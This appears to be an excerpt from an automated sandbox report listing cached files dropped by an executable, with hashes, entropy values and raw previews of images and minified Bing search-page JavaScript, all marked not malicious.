                                                                                                                                                                                                        Preview:.PNG........IHDR...w.........o.lP....pHYs.................sRGB.........gAMA......a...]9IDATx..g.$Wv&....H_......n......1...g..r.IQg.]..?:gWG.;....s.#........;.!....a`f..n.h...].dV...{.......j.C........|..}......................G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 .8lh...5.Hn.R......j'R.;|j!..I\7...Z..G...BhB.<}.....G..X..-...w"..]f.v~..+.HI...#._.k.S.k!t...n..;...6..`...G...L...../...1...Hz..:.....j........a.."..M...(..u.L..+m.3.">....i..pq..v.!..p...m7.gH\.v.{.....j,@...w:@.......v.....>).w.......G.r..LKmE.@........K...v0^........v..b...ja....@t`..u.......{D...}./}...}g.NN. 6..]...PS2.q.Ge<..v ..D....B..B.V...D!.T...@>G.....u.m4.Z.XZ.\X...j..F.Y@.... .."z....

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ni3MyKKVu9pK0SgY6gb6Z2NOGpg[1].jpg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:43:45], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3814
                                                                                                                                                                                                        Entropy (8bit):7.634659202076907
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sQrbnTt8ATpTToooX6l4d309BEEGp0m1amWth0x/aA+9GnPoYXEcX:sS8AyJKl4xV0KamWtOb+SP0cX
                                                                                                                                                                                                        MD5:281570611F89219A970F2589F98A09DB
                                                                                                                                                                                                        SHA1:9E2DCCC8A295BBDA4AD12818EA06FA67634E1A98
                                                                                                                                                                                                        SHA-256:7BDAB4155253E159B748E2BE6CB1C0AF736F18D2A4DBDDF79D93D6219A3DE9DD
                                                                                                                                                                                                        SHA-512:FB9CAEE5B3FF8A3CE8C4D6D066CC0283A8A158E32131754CD9EFB1B4A25303CAA72FAE11C23E836B2A2F0D5005F0E39EB2A38D1D28CB81CAE5C1C818D77B80FB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:43:45....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................... .. ..... .. .. ..$................H.............. ..$..H .. .....AY .....: ...P$..$.. .tXAI ......@....9..I...Rt....f$.Z....+..,.. .t@1.Q.O=..3.l.#.v..1gZ,...[..A&.y.....j....=-.{.[.....5t.y.q..T..t.UY...Z.,..]....{...bI<.4`..<].m'...D..9.......z5.....0G..U.b.e.qn6k7cwo......1G=......)n..g..1.vZ...jIu..9.c.uo=..>...r..-......2..g.V.Z\.{.^c:..Jj.uY....5-."V...?...(......................!..".. .12#0@ABp...............>.....n..>..z..z..n.' .\.J.-...u#.....c~.@d.......|./..g..v....#..:a_....p=$Z.%.3..SN.G..Hi..*_.W........L.........$.?..p_.w. ..e.h..A..9.-[..n.F.......Q.. .2.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\pXVzgohStRjQefcwyp3z6bhIArA.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (924), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):924
                                                                                                                                                                                                        Entropy (8bit):5.195012633286773
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                                                                                                                                                        MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                                                                                                                                                        SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                                                                                                                                                        SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                                                                                                                                                        SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sgLr8Y4mVJegkevNnGDcMsbaTiI.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (902), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):902
                                                                                                                                                                                                        Entropy (8bit):5.200751776659475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:Hl7/nJ4aZUv+MW/sRdrwq50n+pM12vk1Q4W3Idc4Wn:d/Caq+M93H5kOaC3Idmn
                                                                                                                                                                                                        MD5:76ED74A9FD9A74443976389C069CC74A
                                                                                                                                                                                                        SHA1:03AE45E49077B7D87D7FCC434574BA49F95664E3
                                                                                                                                                                                                        SHA-256:B443A3D58AEC4919E37DF4629F8C759A43091B1F63B5A815F8052DF0D8D46804
                                                                                                                                                                                                        SHA-512:D2D13DA2F47C2E94DB3A3B9B6F5185C8352268B1D336BAAA856177BE4B098535BD71BC53819FC73C0F4970DABCB7ECC7F375B4DEB1C25B25474551204B6921F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var HeaderPlusAlgo_Selector;(function(n){function e(n){for(var u,l,h,e=[],c=t(sj_b.querySelectorAll(f+(n?", :focus":""))),s=0;s<c.length;s++)u=c[s],u.className.indexOf("b_ans")!=-1||u.id=="b_pole"?(l=t(u.querySelectorAll(r)),l.length==0&&(h=o(u),h&&e.push(h))):i(u)||e.push(u);return e}function t(n){for(var i=[],t=0;t<n.length;t++)i.push(n[t]);return i}function i(n){if(n){var t=window.getComputedStyle(n);return t&&t.display=="none"?!0:i(n.parentElement)}return!1}function o(n){for(var r,e=t(n.querySelectorAll(u)),f=0;f<e.length;f++)if(r=e[f],!i(r)&&r.tabIndex!=-1)return r;return null}var r="#b_results h2 a,#b_results h3 a,#b_results h4 a",u="input, select, textarea,a[href],*[tabindex = '0']",f=r+",#b_results .b_ans,#b_content #b_pole,#b_content #b_topw";n.getSelectableElements=e})(HeaderPlusAlgo_Selector||(HeaderPlusAlgo_Selector={}));NavSelector=HeaderPlusAlgo_Selector.getSelectableElements

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\w1gdrM6p5Kmzh4Gi9fKcTaefJ1s.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1039), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                        Entropy (8bit):5.394520629964255
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:AaV1T141S2BjoljiHXdX4daXOcRWOkDqBlg:AK41PjEjiHKKwOjXg
                                                                                                                                                                                                        MD5:16050BAAF39976A33AC9F854D5EFDB32
                                                                                                                                                                                                        SHA1:94725020EFA7D3EE8FAED2B7DFFC5A4106363B5E
                                                                                                                                                                                                        SHA-256:039E6B3DF1D67341FB8E4A3815F0D1BB3292A2040334CEB9CFC4A8D6ABF2FB55
                                                                                                                                                                                                        SHA-512:CF0D54F0368FFBC6908216FD2573DF8F5FE4C34AC08E17301B8734B3FABC674672A7F456707F632F82F44B36812DAD8A0CF81A51D5CEA21EA7F0E18500298375
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var UetTag;(function(n){function t(n,t,i,r,u){var e,o,h,s,v,f,c;i===void 0&&(i="script");r===void 0&&(r="//bat.bing.com/bat.js");u===void 0&&(u="uetq");var y=n.location.search.substring(1),l=y.split("&"),a="";for(e=0;e<l.length;e++)if(o=l[e].split("="),o.length>=2&&o[0]==="form"){a=o[1];break}for(h=["MSC001","MSC002","MSC003","MSC005","MSC006","MSC007","MSC008","MSC009","MSC010","MSC011","MSC012","MSC013","MSC014","MSC015","MSC016","MSC017","MSC018","MSC019","MSC020","SP0001","SP0002","MOG001","MOG002","MOG003","MOG004","MOG005","MOG006","MOG007","MOG008","MOG009","MOG010"],s=0;s<h.length;s++)if(h[s]===a){n[u]=n[u]||[];v=function(){var t={ti:"355015334",q:null};t.q=n[u];n.UET&&(n[u]=new n.UET(t)||[]);n[u].push("pageLoad")};f=t.createElement(i);f.src=r;f.async=1;f.onload=f.onreadystatechange=function(){var n=this.readyState;n&&n!=="loaded"&&n!=="complete"||(v(),f.onload=f.onreadystatechange=null)};c=t.getElementsByTagName(i)[0];c.parentNode.insertBefore(f,c);break}}n.uetTaggingInit=t;t(

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\95z5wMy4UcfbSSSlSw780vQ5jKA[1].jpg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:38:22], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5387
                                                                                                                                                                                                        Entropy (8bit):7.799957991588148
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sQ+bfdSpU7SG7bVFwZ1w2f7yXMAZpqdiCRf6LtoIJ7g0WRiKQS+FhIeEIboU3cq:sRdSpU7vbVFwZ11jIIO6M7JqoIZuz3cq
                                                                                                                                                                                                        MD5:69D162774F894FF8B920330E376B7A62
                                                                                                                                                                                                        SHA1:F79CF9C0CCB851C7DB4924A54B0EFCD2F4398CA0
                                                                                                                                                                                                        SHA-256:C9FAA34663FE19EB4D8C007BF00AD7C4BC993F70C9FC42A04801ECCDD59008F7
                                                                                                                                                                                                        SHA-512:9D0E7FA4AC408D9D7D86186E05258BDB615B04AE8EC0DF813C3307A646EC4F87AABA1FCD77914AEA1FFE3607B87BBCA2DCC5D18C076D8AECDEA1496910AEC87D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:38:22....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.......................................................................................S&....1...\.g).l.....^S......^,I..c.7,..YX(."..>wiT.y.:^8........R*.-)s..>.+@..c..V.[Af...T.........3........B.|.~...A..|..r.......(qC..m~..nb...r.LIU.i3.K..........y.]5..\W;b.:/F...v.OW.R^...y^}4._...I4.t....l......,.$.C.....6..IS..E...../..J...5...%....Z.eK.u....j.........*x.{..t.!....@,...}..W...X8.S.........X.Z...-.w..(.8...z..EC..\....8.m5...z....Y.!\...!@.<:b].-.i}.....?..%...=gE.VM..\.2CJ..kK.d...o.!..v...M.e..4,...l...Y0...V.[.g..r.....h.....[-..-.....J....9kA..L...#.!"."kO.;...R.2...)Mr...X8....G.;A..".!az..Ud.Ie......+..........................!34 "12..$0ABCD........

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\DEjxwvkpxv2TrYEFLbNhRWrxeFg.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1833), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1833
                                                                                                                                                                                                        Entropy (8bit):5.03858600819449
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:Jk08PkQix8QboQO7cxfFb87c9nH40VtN3HCBuNDbHNxpA:sPb6oZY80tVbHDtTA
                                                                                                                                                                                                        MD5:D7365C424E30CB142A85B84C0618D671
                                                                                                                                                                                                        SHA1:7212FE88CD0686A381ACB1B0583A544AE3ADA1B0
                                                                                                                                                                                                        SHA-256:8FD0225B5F75EE2326ADC68A10F5B9FC50C30A45BF4B61C7EE9364103E6102C8
                                                                                                                                                                                                        SHA-512:26D9A5DA2CC591954C6014B4DE1826653C9F058E9C8287342D8F0F2C9960BDAF30E1D4F8ADDF529830327D94C8BCA21848A3ADAF2846036A5E9C618992B18D5F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var ExtendIconClickTargetV2;(function(){function n(){var u=document.querySelectorAll(".b_tpcn"),e,r,f,n,i,t;if(u)for(e=function(n){var r=u[n],i,t,f;if(r&&(r.onclick=function(n){if(!n||n.target===r){var t=r.querySelector(".tilk");t&&(_w.si_T&&_w.si_T(t.getAttribute("h")),t.click())}},i=r.nextElementSibling,i&&(r.addEventListener("mouseover",function(){r.style.cursor="pointer";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="underline")}),r.addEventListener("mouseout",function(){r.style.cursor="";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="")}),t=i,!t||t.classList&&t.classList.contains("b_title")||t.tagName==="H2"||t.tagName==="H3"||(t=t.querySelector("h2, h3")),t))){if(f=t.querySelector("a"),!f)return{value:void 0};t.addEventListener("mouseover",function(n){n&&n.target===t&&(t.style.cursor="pointer",f.style.textDecoration="underline")});t

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\LI6CzlNYU7PeZ9WzomWpS4lm-BI.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1580), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1580
                                                                                                                                                                                                        Entropy (8bit):5.0552055236738624
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:CFIaycqwxXvP6D0oagJXOd9TFlk2g8y7t/agPeC2RWgRWK5RWtYFGNKlZxvNGb30:5apDEDM8P2wgwK5wtnwlnNGbBpfGbVjN
                                                                                                                                                                                                        MD5:56AFA9B2C4EAD188D1DD95650816419B
                                                                                                                                                                                                        SHA1:C1E4D984C4F85B9C7FB60B66B039C541BF3D94F6
                                                                                                                                                                                                        SHA-256:E830AEB6BC4602A3D61E678B1C22A8C5E01B9FB9A66406051D56493CC3087B4B
                                                                                                                                                                                                        SHA-512:D97432E68AFDAA2CFAEFF497C2FF70208BD328713F169380D5AFB5D5EECD29E183A79BEC99664DBEE13FD19FE21EBAE7396315AC77A196BFB0AB855507F3DACF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var Lib;(function(n){var t;(function(n){function u(n,t){var r,i;if(t==null||n==null)throw new TypeError("Null element passed to Lib.CssClass");if(n.indexOf)return n.indexOf(t);for(r=n.length,i=0;i<r;i++)if(n[i]===t)return i;return-1}function f(n,u){if(n==null)throw new TypeError("Null element passed to Lib.CssClass. add className:"+u);if(!r(n,u))if(i&&n.classList)n.classList.add(u);else{var f=t(n)+" "+u;o(n,f)}}function e(n,f){var e,s,h;if(n==null)throw new TypeError("Null element passed to Lib.CssClass. remove className:"+f);r(n,f)&&(i&&n.classList?n.classList.remove(f):(e=t(n).split(" "),s=u(e,f),s>=0&&e.splice(s,1),h=e.join(" "),o(n,h)))}function s(n,t){if(n==null)throw new TypeError("Null element passed to Lib.CssClass. toggle className:"+t);i&&n.classList?n.classList.toggle(t):r(n,t)?e(n,t):f(n,t)}function r(n,r){var f,e;if(n==null)throw new TypeError("Null element passed to Lib.CssClass. contains className:"+r);return i&&n.classList?n.classList.contains(r):(f=t(n),f)?(e=f.split("

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\PgVOrYqTvqK49IEnVEVlZVYfA1U.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (576), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):576
                                                                                                                                                                                                        Entropy (8bit):5.192163014367754
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                                                                                                                                                        MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                                                                                                                                                        SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
                                                                                                                                                                                                        SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                                                                                                                                                        SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\T3t6V3azgG4BlSRcguR2ssuUOxQ[1].png

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 60 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1045
                                                                                                                                                                                                        Entropy (8bit):7.812007487462295
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2YvL3J/eQWCXbwIoGryAFXt3jwRDa9W3TH:Rv1NHUIbrzU3TH
                                                                                                                                                                                                        MD5:2AA8CAB3D7B05D1540A69E6DA11C916B
                                                                                                                                                                                                        SHA1:4F7B7A5776B3806E0195245C82E476B2CB943B14
                                                                                                                                                                                                        SHA-256:BE40B55ED2C02CA68A1527E8B50CB949FFF17EC444504F9ABCE98C97EBAD1738
                                                                                                                                                                                                        SHA-512:FEC6CD89DA1CC4630A229567101F83D979860F6CDF34FEA00174052FDEE93F00F8F0AA489C565F6CD1BCEE3124DFCB1DCE9418FBA7B3983EF6F6946C8689B241
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR...<.........=P.D....IDATx..?LSA.......J(......YcY\.......%&n.XD....X...N..Q...US.IL...z.?.?.}..I.......~w....Jv..Q..........8M...6..%..X.u....\.f.X..>u.d..E.+b6.P4.].........W.}t..jc......^.....p.).".U.H...y...i...Fz......a`.,Gr.8XP.K3@./.U...+........d`.;...,...{.U.s.:...<O......~..'.8#{...5....9...../."S.....9...Nr<=.u57.?G.a.x......}.....6n=W.3}...(.QV....y..R..G`.J...5....h.R.Z).:8.../5.%&..9..M...jQ.V?..[-E...........-....1.[!....)Ml].i.I. 8.).A.aiE./0.C'.P...v.....e(.....;...E...i..D....ea.#.3)..h..&,...Y..$-G......G...IY..T...mP.5?l...5w..t....m.O6........o(...f.k..Q5.....A.....S.......s.D..R.....^..{o..~..a...X....Z.I..Z.*/m...$....\..2O.$%.3;....)..m...}h.l....&.OPq.k......T.:q.E.p"".....{V.$/4a9.G.4.E..1..{... Y.....:3.9.&m..Z...k.'........v.\.e...y+.L..%..{..8..E..R&....[I.P......0.u/#.......f......e....H'.v..qp..J.w..}e.*.,..@....7Sjd.$aW......o.'R...L.#...0....K..rT`>>......Y2..,...!.......T

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UiCBzdqhH8tMlfayZdAijZAB5sE.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (918), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):918
                                                                                                                                                                                                        Entropy (8bit):5.212381384143468
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:i2387E/Xv3qtMbKRgibYe9BqoGbKR7oGbY7oGbnewCY0ZWFU0fZy5c6MwQOR:dqtMbK7bLrGbKuGbjGbnXTWWSr5c6MwV
                                                                                                                                                                                                        MD5:341FC0ACD15DF6D8A064E4C3A896F65D
                                                                                                                                                                                                        SHA1:1258FD48A874D80CB635BE454F9E4023A0DF7C49
                                                                                                                                                                                                        SHA-256:4BC6635D4D95F9C05A91904B19370A40CC6E4C2AB43661C00615EDDADEFCF9EB
                                                                                                                                                                                                        SHA-512:6B552D786E782C36F17BEE1A6AE204F1E8C9F85BE5EB9ADAC1793D60B537CAD13228CB2D4299949F051E6BC364C2E5A4105DE9BBF2885F492EDB425CB14CE982
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var KeyPressScroll;(function(){function i(i){var u=i.key,f=document.activeElement,r,e,o;document.querySelector("cib-serp[mode='conversation']")||document.querySelector(".b_selected")||typeof i.composedPath=="function"&&(r=i.composedPath(),r&&r[0]&&(r[0]instanceof HTMLInputElement||r[0]instanceof HTMLTextAreaElement))||i.ctrlKey||i.shiftKey||i.metaKey||i.altKey||!u||u.length!==1||u===" "||f instanceof HTMLInputElement||f instanceof HTMLTextAreaElement||f instanceof HTMLElement&&f.isContentEditable||(typeof sj_log=="function"&&sj_log("CI.KeyPressScroll","KeyBoard_Triggered",u),n.value="",t.scrollIntoView({behavior:"smooth"}),t.style.display="block",e=_ge("sb_form"),e&&Lib.CssClass.remove(e,"form_sb_hidden"),n.focus(),n.click(),o=n.value,n.setSelectionRange(o.length,o.length))}function r(){n&&t&&sj_be(document,"keydown",i,!0)}var n=_ge("sb_form_q"),t=_ge("b_header");r()})(KeyPressScroll||(KeyPressScroll={}))

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\bgNvw2gj4n0x2fVy9WAk0RbfPQQ.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34732), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):34732
                                                                                                                                                                                                        Entropy (8bit):5.452487645923916
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:+J0AmB7aPmB7aU1THyBVyD3NSrGyDQS+mZvUhM/4S8SrmB:+aaUaJCDA3DjHZv37n6
                                                                                                                                                                                                        MD5:E4FB9B839186660B1F729B8DF8C994B4
                                                                                                                                                                                                        SHA1:931792CD70CED4AD586F6329C30C294EBEA1548E
                                                                                                                                                                                                        SHA-256:6838611C8AB6539005E11C84CA308158F89A51DB57A62CAF21FAAB48BF576177
                                                                                                                                                                                                        SHA-512:625436BB52CBD7DF7ED03BE05FEA52C5D54B6CC15037D70C268D9598E648A22246DB902B9C6F097BA8B18BD924F6AB17120736285D54DCE13773237F1669853A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",w="_RwBf",b="rwmrst",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redDotImage.png",k=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible,hasUsedCcpTrial:n&&n.RewardsSessionData&&n.RewardsSessionData.HasUsedCcpTrial}}re

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\byLmVJQA1UzOFcrs9Jrvys4jXhM.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1725), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1725
                                                                                                                                                                                                        Entropy (8bit):5.274895734185393
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:y2x50QNQE0YpOP8A47n0dvZ1fj5O7Rv75gZcODcv/Kum65X9gFiO5yV94GVvwCQO:7Lps4YJOVuK2KG65tggZV5
                                                                                                                                                                                                        MD5:2EF3074238B080B648E9A10429D67405
                                                                                                                                                                                                        SHA1:15D57873FF98195C57E34FC778ACCC41C21172E7
                                                                                                                                                                                                        SHA-256:E90558EB19208AD73F0DE1CD9839D0317594BF23DA0514F51272BF27183F01DA
                                                                                                                                                                                                        SHA-512:C1D7074A0EBF5968B468F98FC4C0C7829999E402DD91C617E679EEB46C873DC04096CBF9277E115FC42C97516A6C11A9F16AFA571E00F0D826BEB463E2D1F7B0
                                                                                                                                                                                                        Malicious:false
